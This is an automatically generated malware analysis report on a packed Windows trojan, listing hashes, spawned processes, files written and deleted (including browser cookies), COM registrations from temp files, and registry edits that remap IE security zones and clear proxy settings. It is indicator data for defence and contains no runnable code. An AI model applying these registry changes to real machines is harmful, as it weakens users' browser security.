HEUR:Trojan.Win32.Generic (Kaspersky), Gen:Trojan.Heur.Dropper.hmGfamxW9Ncb (B) (Emsisoft), Gen:Trojan.Heur.Dropper.hmGfamxW9Ncb (AdAware), Trojan.Win32.Swrort.3.FD, PUPHomePages.YR, GenericInjector.YR (Lavasoft MAS)
Behaviour: Trojan, PUP
The description has been automatically generated by Lavasoft Malware Analysis System and it may contain incomplete or inaccurate information.
Summary
MD5: 01a6ec54d2ba5e3611ef733ea2747189
SHA1: 2b9e5534a15de090d0e42a199048facac2887052
SHA256: 8eace449341619f902191cdc9dec971c6b3164c8a992b188152062fc0669fc98
SSDeep: 3072:rpdtP1lmEyLL6iAlpJEdULhfTRJ0mNZyV29kxFwsvDctoutU:r9Xm365lpKQB1JjHyV290FwsrctoSU
Size: 117248 bytes
File type: EXE
Platform: WIN32
Entropy: Packed
PEID: PackerUPXCompresorGratuitowwwupxsourceforgenet, UPolyXv05_v6
Company: no certificate found
Created at: 2013-02-28 06:07:37
Analyzed on: WindowsXP SP3 32-bit
Summary: Trojan. A program that appears to do one thing but actually does another (a.k.a. Trojan Horse).
Dynamic Analysis
Payload
No specific payload has been found.
Process activity
The Trojan creates the following process(es):
regsvr32.exe:1760
regsvr32.exe:2020
regsvr32.exe:1412
sc.exe:1164
sc.exe:896
The Trojan injects its code into the following process(es):
%original file name%.exe:516
Mutexes
The following mutexes were created/opened:
No objects were found.
File activity
The process %original file name%.exe:516 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\~2662TXStartUpdateLog.tmp (7386 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OX6J4PMZ\homepro[1].txt (161 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\~DFA27678.tmpbak (11299 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\~DFIC4966.tmp (11385 bytes)
%WinDir%\system\lock.dat (112 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\05I7KPMB\exitpop[1].txt (572 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\remote.tmp (100 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\insert.tmp (2490 bytes)
%WinDir%\win.ini (4626 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OHYRGXIJ\newDomain[1].txt (21 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\~DFBIC753.TMP (17716 bytes)
%WinDir%\lock.log (914 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\yxjpq.tmp (588 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\DFA2796.tmp (199 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OX6J4PMZ\InsertWnd[1].txt (671 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\05I7KPMB\InsertWnd_enlc[1].dll (19378 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\safe.tmp.dat (2 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\89AJKDYV\safeen[1].txt (670 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OHYRGXIJ\pubjc[1].txt (21084 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\~DFA90A3.TMP (160 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\89AJKDYV\osm[1].dll (11953 bytes)
%Documents and Settings%\%current user%\Application Data\8901.dat (503 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\05I7KPMB\newcor[1].dll (34450 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OX6J4PMZ\yxjpq[1].txt (588 bytes)
%System%\lockie.ini (112 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\prosafe.tmp (845 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\~DFA3334.tmp (3383 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\~DFBC626.tmp (8314 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\jslist.tmp (692 bytes)
%System%\mswinsck.ocx (108 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\~prohome.tmp (161 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\xsend.tmp (37241 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3.tmp (6262 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\~IcsaVas32.tmp (58 bytes)
%WinDir%\sys.dat (7212 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\05I7KPMB\jzjc[1].txt (154 bytes)
%System%\gdi30.dll (112 bytes)
%Documents and Settings%\%current user%\Application Data\Microsoft\Crypto\RSA\S-1-5-21-1844237615-1960408961-1801674531-1003\c5b88721db08c824db69d0bbc702beb8_75ed9567-aa58-4c8e-a8ea-3cad7c47ab03 (44 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\2.tmp (8 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\89AJKDYV\jslist[1].txt (1405 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\~tcjk.tmp (8 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OX6J4PMZ\file[1].txt (199 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\~DFA8273.tmp (49 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\~DFB3931.tmp (4418 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\~url.tmp (454 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\domain.tmp (21 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OHYRGXIJ\ic[1].htm (219 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\~DFA27678.tmp (47412 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\jzjc.tmp (154 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\safe.tmp (2 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OX6J4PMZ\jzurl[1].txt (1224 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\5.tmp (294 bytes)
%System%\drivers\etc\hosts.tmp (2822 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\05I7KPMB\tfgg[1].txt (454 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\89AJKDYV\icdata[1].dll (18063 bytes)
%WinDir%\xdrq\lockie.ini (208 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OHYRGXIJ\eb[1].txt (1721 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\4.tmp (19996 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\89AJKDYV\InsertWnd_2345title_en[1].dll (16223 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OHYRGXIJ\taian[1].ini (1006 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\~DUs6109.tmp (503 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\1.tmp (2 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OX6J4PMZ\serList[1].txt (1521 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OHYRGXIJ\prosafe[1].txt (845 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\eb.tmp (13 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\serList.txt (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\~DFA6871.tmp (11948 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\jzurl.tmp (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\89AJKDYV\urlRemote[1].txt (100 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\4990.dat (503 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\~IcVas32.tmp (388 bytes)
%WinDir%\Media\ad.ini (572 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\~DFBC263.TMP (16428 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\89AJKDYV\jzyxj[1].txt (1824 bytes)
The Trojan deletes the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\~2662TXStartUpdateLog.tmp (0 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@ssl.bing[1].txt (0 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@rambler[2].txt (0 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@money.ca.msn[1].txt (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\~IcVas32.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\~prohome.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\~DFBC626.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\~IcsaVas32.tmp (0 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@msnportal.112.2o7[1].txt (0 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@kaspersky[1].txt (0 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@www.msn[2].txt (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\remote.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\~DFA27678.tmpbak (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\4.tmp (0 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@aaa[1].txt (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\safe.tmp.dat (0 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@bing[1].txt (0 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@twitter[1].txt (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\eb.tmp (0 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@auto.search.msn[1].txt (0 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@microsoft[1].txt (0 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@c.msn[1].txt (0 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@abmr[2].txt (0 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@hit.gemius[1].txt (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\jslist.tmp (0 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@c.bing[2].txt (0 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@pass.yandex[1].txt (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3.tmp (0 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@atdmt[2].txt (0 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@kaspersky.122.2o7[2].txt (0 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@c.ca.msn[1].txt (0 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@doubleclick[1].txt (0 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@adnxs[2].txt (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\2.tmp (0 bytes)
%Documents and Settings%\%current user%\Application Data\8901.dat (0 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@hm.baidu[1].txt (0 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@adgear[1].txt (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\~DFB3931.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\~url.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\domain.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\jzjc.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\safe.tmp (0 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@c.atdmt[2].txt (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\prosafe.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\5.tmp (0 bytes)
%System%\drivers\etc\hosts.tmp (0 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@yandex[3].txt (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\~DFIC4966.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\yxjpq.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\~tcjk.tmp (0 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@yandex[2].txt (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OHYRGXIJ\taian[1].ini (0 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@msn[2].txt (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\1.tmp (0 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@yandex[1].txt (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\serList.txt (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\jzurl.tmp (0 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@www.bing[1].txt (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\4990.dat (0 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@tns-counter[1].txt (0 bytes)
%WinDir%\Media\ad.ini (0 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@scorecardresearch[2].txt (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\89AJKDYV\jzyxj[1].txt (0 bytes)
Registry activity
The process regsvr32.exe:1760 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKCR\MSWinsock.Winsock]
"(Default)" = "Microsoft WinSock Control, version 6.0"
[HKCR\CLSID\{248DD896-BB45-11CF-9ABC-0080C7E7B78D}\ToolboxBitmap32]
"(Default)" = "%System%\mswinsck.ocx, 1"
[HKCR\Interface\{248DD893-BB45-11CF-9ABC-0080C7E7B78D}\ProxyStubClsid]
"(Default)" = "{00020420-0000-0000-C000-000000000046}"
[HKCR\CLSID\{248DD897-BB45-11CF-9ABC-0080C7E7B78D}\InprocServer32]
"(Default)" = "%System%\mswinsck.ocx"
[HKCR\Interface\{248DD893-BB45-11CF-9ABC-0080C7E7B78D}\TypeLib]
"Version" = "1.0"
[HKCR\CLSID\{248DD896-BB45-11CF-9ABC-0080C7E7B78D}\MiscStatus\1]
"(Default)" = "132497"
[HKCR\Interface\{248DD892-BB45-11CF-9ABC-0080C7E7B78D}]
"(Default)" = "IMSWinsockControl"
[HKCR\MSWinsock.Winsock\CLSID]
"(Default)" = "{248DD896-BB45-11CF-9ABC-0080C7E7B78D}"
[HKCR\CLSID\{248DD897-BB45-11CF-9ABC-0080C7E7B78D}]
"(Default)" = "Winsock General Property Page Object"
[HKCR\CLSID\{248DD896-BB45-11CF-9ABC-0080C7E7B78D}\InProcServer32]
"(Default)" = "%System%\mswinsck.ocx"
[HKCR\Interface\{248DD893-BB45-11CF-9ABC-0080C7E7B78D}\TypeLib]
"(Default)" = "{248DD890-BB45-11CF-9ABC-0080C7E7B78D}"
[HKCR\TypeLib\{248DD890-BB45-11CF-9ABC-0080C7E7B78D}\1.0\0\win32]
"(Default)" = "%System%\mswinsck.ocx"
[HKCR\Interface\{248DD893-BB45-11CF-9ABC-0080C7E7B78D}]
"(Default)" = "DMSWinsockControlEvents"
[HKCR\Interface\{248DD892-BB45-11CF-9ABC-0080C7E7B78D}\ProxyStubClsid]
"(Default)" = "{00020424-0000-0000-C000-000000000046}"
[HKCR\CLSID\{248DD896-BB45-11CF-9ABC-0080C7E7B78D}\VersionIndependentProgID]
"(Default)" = "MSWinsock.Winsock"
[HKCR\CLSID\{248DD896-BB45-11CF-9ABC-0080C7E7B78D}\InProcServer32]
"ThreadingModel" = "Apartment"
[HKCR\Interface\{248DD892-BB45-11CF-9ABC-0080C7E7B78D}\TypeLib]
"Version" = "1.0"
"(Default)" = "{248DD890-BB45-11CF-9ABC-0080C7E7B78D}"
[HKCR\CLSID\{248DD896-BB45-11CF-9ABC-0080C7E7B78D}\ProgID]
"(Default)" = "MSWinsock.Winsock.1"
[HKCR\CLSID\{248DD896-BB45-11CF-9ABC-0080C7E7B78D}]
"(Default)" = "Microsoft WinSock Control, version 6.0"
[HKCR\TypeLib\{248DD890-BB45-11CF-9ABC-0080C7E7B78D}\1.0]
"(Default)" = "Microsoft Winsock Control 6.0"
[HKCR\CLSID\{248DD896-BB45-11CF-9ABC-0080C7E7B78D}\Version]
"(Default)" = "1.0"
[HKCR\TypeLib\{248DD890-BB45-11CF-9ABC-0080C7E7B78D}\1.0\FLAGS]
"(Default)" = "2"
[HKCR\MSWinsock.Winsock\CurVer]
"(Default)" = "MSWinsock.Winsock.1"
[HKCR\Interface\{248DD893-BB45-11CF-9ABC-0080C7E7B78D}\ProxyStubClsid32]
"(Default)" = "{00020420-0000-0000-C000-000000000046}"
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "4E E2 FC 3D B1 95 0B 9F F5 86 FB 43 AB 39 18 38"
[HKCR\CLSID\{248DD896-BB45-11CF-9ABC-0080C7E7B78D}\MiscStatus]
"(Default)" = "0"
[HKCR\MSWinsock.Winsock.1\CLSID]
"(Default)" = "{248DD896-BB45-11CF-9ABC-0080C7E7B78D}"
[HKCR\Interface\{248DD892-BB45-11CF-9ABC-0080C7E7B78D}\ProxyStubClsid32]
"(Default)" = "{00020424-0000-0000-C000-000000000046}"
[HKCR\TypeLib\{248DD890-BB45-11CF-9ABC-0080C7E7B78D}\1.0\HELPDIR]
"(Default)" = ""
[HKCR\CLSID\{248DD896-BB45-11CF-9ABC-0080C7E7B78D}\TypeLib]
"(Default)" = "{248DD890-BB45-11CF-9ABC-0080C7E7B78D}"
[HKCR\MSWinsock.Winsock.1]
"(Default)" = "Microsoft WinSock Control, version 6.0"
The Trojan deletes the following registry key(s):
[HKCR\CLSID\{248DD897-BB45-11CF-9ABC-0080C7E7B78D}]
[HKCR\CLSID\{248DD896-BB45-11CF-9ABC-0080C7E7B78D}]
The Trojan deletes the following value(s) in system registry:
[HKCR\CLSID\{248DD897-BB45-11CF-9ABC-0080C7E7B78D}\InprocServer32]
"ThreadingModel"
The process regsvr32.exe:2020 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "5C 12 AF FC 0C 86 99 69 34 4E 30 8D EB 42 B6 C3"
[HKCR\Es58.P2P\Clsid]
"(Default)" = "{94A1ADBF-7F8D-4B8A-B3FA-48E69CB4C804}"
[HKCR\TypeLib\{52DAF8C9-8861-47A8-BC17-077666A2342A}\1.0\HELPDIR]
"(Default)" = "C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp"
[HKCR\TypeLib\{52DAF8C9-8861-47A8-BC17-077666A2342A}\1.0]
"(Default)" = "Es58"
[HKCR\TypeLib\{52DAF8C9-8861-47A8-BC17-077666A2342A}\1.0\0\win32]
"(Default)" = "C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\~DFA8273.tmp"
[HKCR\CLSID\{94A1ADBF-7F8D-4B8A-B3FA-48E69CB4C804}\TypeLib]
"(Default)" = "{52DAF8C9-8861-47A8-BC17-077666A2342A}"
[HKCR\Interface\{3FAF77B7-5DD0-45E7-A92A-8C92F95D2964}\TypeLib]
"Version" = "1.0"
[HKCR\Es58.P2P]
"(Default)" = "Es58.P2P"
[HKCR\Interface\{3FAF77B7-5DD0-45E7-A92A-8C92F95D2964}\TypeLib]
"(Default)" = "{52DAF8C9-8861-47A8-BC17-077666A2342A}"
[HKCR\Interface\{3FAF77B7-5DD0-45E7-A92A-8C92F95D2964}]
"(Default)" = "_P2P"
[HKCR\CLSID\{94A1ADBF-7F8D-4B8A-B3FA-48E69CB4C804}]
"(Default)" = "Es58.P2P"
[HKCR\CLSID\{94A1ADBF-7F8D-4B8A-B3FA-48E69CB4C804}\VERSION]
"(Default)" = "1.0"
[HKCR\Interface\{3FAF77B7-5DD0-45E7-A92A-8C92F95D2964}\ProxyStubClsid]
"(Default)" = "{00020424-0000-0000-C000-000000000046}"
[HKCR\CLSID\{94A1ADBF-7F8D-4B8A-B3FA-48E69CB4C804}\ProgID]
"(Default)" = "Es58.P2P"
[HKCR\TypeLib\{52DAF8C9-8861-47A8-BC17-077666A2342A}\1.0\FLAGS]
"(Default)" = "0"
[HKCR\CLSID\{94A1ADBF-7F8D-4B8A-B3FA-48E69CB4C804}\InprocServer32]
"ThreadingModel" = "Apartment"
"(Default)" = "C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\~DFA8273.tmp"
[HKCR\Interface\{3FAF77B7-5DD0-45E7-A92A-8C92F95D2964}\ProxyStubClsid32]
"(Default)" = "{00020424-0000-0000-C000-000000000046}"
The process regsvr32.exe:1412 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKCR\TypeLib\{2E807400-75B1-4B75-A0E0-B8C988EF27FD}\4f4.0\FLAGS]
"(Default)" = "0"
[HKCR\TypeLib\{2E807400-75B1-4B75-A0E0-B8C988EF27FD}\4f4.0\HELPDIR]
"(Default)" = "C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp"
[HKCR\CLSID\{47FE363A-0CEE-427D-BC3C-B7D8A6003F46}\InprocServer32]
"(Default)" = "C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\~DFA6871.tmp"
[HKCR\Interface\{8DE3FC9B-D6F6-4C88-9D59-0FC52E097E7A}\ProxyStubClsid]
"(Default)" = "{00020424-0000-0000-C000-000000000046}"
[HKCR\Interface\{B086A7BA-3D02-4E1C-AEB8-D9DDB1C551AC}\TypeLib]
"Version" = "4f4.0"
"(Default)" = "{2E807400-75B1-4B75-A0E0-B8C988EF27FD}"
[HKCR\yswm.FileIO\Clsid]
"(Default)" = "{47FE363A-0CEE-427D-BC3C-B7D8A6003F46}"
[HKCR\Interface\{B086A7BA-3D02-4E1C-AEB8-D9DDB1C551AC}\ProxyStubClsid]
"(Default)" = "{00020424-0000-0000-C000-000000000046}"
[HKCR\Interface\{8DE3FC9B-D6F6-4C88-9D59-0FC52E097E7A}\TypeLib]
"Version" = "4f4.0"
[HKCR\TypeLib\{2E807400-75B1-4B75-A0E0-B8C988EF27FD}\4f4.0\0\win32]
"(Default)" = "C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\~DFA6871.tmp"
[HKCR\CLSID\{B007063B-34E1-4EA4-BC29-11D1AE806386}\VERSION]
"(Default)" = "1268.0"
[HKCR\yswm.FileIO]
"(Default)" = "yswm.FileIO"
[HKCR\CLSID\{B007063B-34E1-4EA4-BC29-11D1AE806386}\TypeLib]
"(Default)" = "{2E807400-75B1-4B75-A0E0-B8C988EF27FD}"
[HKCR\CLSID\{47FE363A-0CEE-427D-BC3C-B7D8A6003F46}]
"(Default)" = "yswm.FileIO"
[HKCR\Interface\{8DE3FC9B-D6F6-4C88-9D59-0FC52E097E7A}]
"(Default)" = "_FileIO"
[HKCR\CLSID\{47FE363A-0CEE-427D-BC3C-B7D8A6003F46}\VERSION]
"(Default)" = "1268.0"
[HKCR\Interface\{B086A7BA-3D02-4E1C-AEB8-D9DDB1C551AC}]
"(Default)" = "_runsoft"
[HKCR\Interface\{B086A7BA-3D02-4E1C-AEB8-D9DDB1C551AC}\ProxyStubClsid32]
"(Default)" = "{00020424-0000-0000-C000-000000000046}"
[HKCR\yswm.runsoft]
"(Default)" = "yswm.runsoft"
[HKCR\TypeLib\{2E807400-75B1-4B75-A0E0-B8C988EF27FD}\4f4.0]
"(Default)" = "yswm"
[HKCR\Interface\{8DE3FC9B-D6F6-4C88-9D59-0FC52E097E7A}\ProxyStubClsid32]
"(Default)" = "{00020424-0000-0000-C000-000000000046}"
[HKCR\Interface\{8DE3FC9B-D6F6-4C88-9D59-0FC52E097E7A}\TypeLib]
"(Default)" = "{2E807400-75B1-4B75-A0E0-B8C988EF27FD}"
[HKCR\CLSID\{B007063B-34E1-4EA4-BC29-11D1AE806386}\InprocServer32]
"(Default)" = "C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\~DFA6871.tmp"
[HKCR\yswm.runsoft\Clsid]
"(Default)" = "{B007063B-34E1-4EA4-BC29-11D1AE806386}"
[HKCR\CLSID\{B007063B-34E1-4EA4-BC29-11D1AE806386}\InprocServer32]
"ThreadingModel" = "Apartment"
[HKCR\CLSID\{47FE363A-0CEE-427D-BC3C-B7D8A6003F46}\TypeLib]
"(Default)" = "{2E807400-75B1-4B75-A0E0-B8C988EF27FD}"
[HKCR\CLSID\{B007063B-34E1-4EA4-BC29-11D1AE806386}]
"(Default)" = "yswm.runsoft"
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "39 FF 4A 2F CB 67 23 3E 5B 37 7D E8 C4 22 48 2B"
[HKCR\CLSID\{47FE363A-0CEE-427D-BC3C-B7D8A6003F46}\InprocServer32]
"ThreadingModel" = "Apartment"
[HKCR\CLSID\{47FE363A-0CEE-427D-BC3C-B7D8A6003F46}\ProgID]
"(Default)" = "yswm.FileIO"
[HKCR\CLSID\{B007063B-34E1-4EA4-BC29-11D1AE806386}\ProgID]
"(Default)" = "yswm.runsoft"
The process %original file name%.exe:516 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
"Personal" = "%Documents and Settings%\%current user%\My Documents"
"Cookies" = "%Documents and Settings%\%current user%\Cookies"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
[HKCR\TypeLib\{1EA4DBF0-3C3B-11CF-810C-00AA00389B71}\1.1\0\win32]
"(Default)" = "%System%\oleacc.dll"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Desktop" = "%Documents and Settings%\%current user%\Desktop"
[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 28 00 00 00 01 00 00 00 00 00 00 00"
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "76 E4 2B F3 D7 BE 4E D5 CF B3 F8 F6 17 72 A4 D7"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"
The Trojan modifies IE security zone settings to map all local web nodes whose names contain no dots and which are not assigned to any zone to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"
The Trojan modifies IE security zone settings to map all web nodes that bypass the proxy to the Intranet Zone:
"ProxyBypass" = "1"
Proxy settings are disabled:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
The Trojan modifies IE security zone settings to map all URLs to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"
The Trojan deletes the following value(s) in system registry:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"
The process sc.exe:1164 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "15 BA CA A3 C6 4F D5 87 EF 3F 05 22 35 DB EB C4"
The process sc.exe:896 makes changes in the system registry.
